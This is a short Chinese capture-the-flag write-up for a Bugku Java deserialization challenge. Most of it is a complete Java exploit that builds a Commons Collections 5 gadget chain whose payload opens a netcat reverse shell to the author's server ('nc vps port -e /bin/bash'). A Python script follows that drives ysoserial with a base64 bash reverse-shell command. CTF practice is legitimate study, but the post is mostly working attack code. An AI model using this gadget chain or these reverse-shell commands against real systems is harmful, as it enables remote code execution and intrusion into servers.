bugku_ez_java_serializd

下载附件看到依赖CC3.1,没有waf,直接CC5打了。

package com.eddiemurphy;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;

public class Exp {

    public static void main(String[] args) throws ClassNotFoundException, IllegalAccessException, NoSuchFieldException, IOException {
        //*********************cc1***********************
        ChainedTransformer chain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(java.lang.Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class, Class[].class}, new Object[]{
                        "getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{
                        Object.class, Object[].class}, new Object[]{
                        null, new Object[0]}),
//#####################################
                new InvokerTransformer("exec",
                        new Class[]{String.class}, new Object[]{"nc vps port -e /bin/bash"})});
        //*********************调用LazyMap***********************
        HashMap mmap = new HashMap();
        LazyMap tiemap = (LazyMap) LazyMap.decorate(mmap, chain);
        //*********************调用TiedMapEntry.toString进而调用其getValue方法***********
        TiedMapEntry mapEntry = new TiedMapEntry(tiemap, 1);   //*********************BadAttributeValueExpException#readObject ***********

        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc, mapEntry);
        ByteArrayOutputStream output = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(output);
        outputStream.writeObject(poc);
        outputStream.close();
        byte[] bytes = output.toByteArray();
        String a = Base64.getEncoder().encodeToString(bytes);
        System.out.println(a);
    }
}

这里bash弹失败了,换nc才ok了,而且传payload的时候还要再一次url编码。

也可以直接ysoserial打,这里我好像bash也成功了,同时也记得把1.txt里的序列化数据url编码一下:

import subprocess
import base64

# 执行命令行命令
command = 'java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,<base64反弹shell>}|{base64,-d}|{bash,-i}"'
result = subprocess.check_output(command, shell=True)

# 对结果进行base64编码
encoded_result = base64.b64encode(result)

# 将编码后的结果写入到1.txt文件中
with open('1.txt', 'wb') as file:
    file.write(encoded_result)

 

java题不好找啊,现在开始一个个审链子了。

posted @ 2024-04-29 19:19  Eddie_Murphy  阅读(4)  评论(0编辑  收藏  举报